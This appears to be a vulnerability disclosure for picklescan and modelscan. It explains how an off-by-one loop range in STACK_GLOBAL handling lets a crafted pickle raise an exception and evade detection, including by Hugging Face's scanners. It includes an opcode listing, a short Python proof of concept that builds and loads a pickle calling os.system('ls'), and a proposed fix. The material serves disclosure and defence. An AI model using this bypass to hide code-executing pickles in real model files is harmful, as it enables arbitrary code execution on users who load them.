There's a parsing logic error in picklescan and modelscan while trying to deal with opcode STACK GLOBAL. Function list globals when handling STACK GLOBAL at position n, it is expected to track two arguments but in wrong range. The loop only consider the range from 1 to n-1 but forgets to consider the opcode at position 0. The correct range should be 0 to n-1. Attacker can put arg in position 0, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.

Example:

  0: S  STRING   'os' --> arg 0: STRING (untracked argument due to wrong scanning range)
  6: S  STRING   'system' --> arg 1: STRING (tracked argument)
  16: x93 STACK GLOBAL
  17: S  STRING   'ls'
  23: x85 TUPLE1
  24: R  REDUCE
  25: .  STOP

import pickle
payload = b"S'os'
S'system'
x93S'ls'
x85R."
with open('bad pickle.pkl', 'wb') as f:
  f.write(payload)
pickle.load(open('bad pickle.pkl', 'rb'))

Detection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection.

To fix the range here, change range(1, n) to range(1, n+1) to ensure that n-offset stays within the range of 0 to n. https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255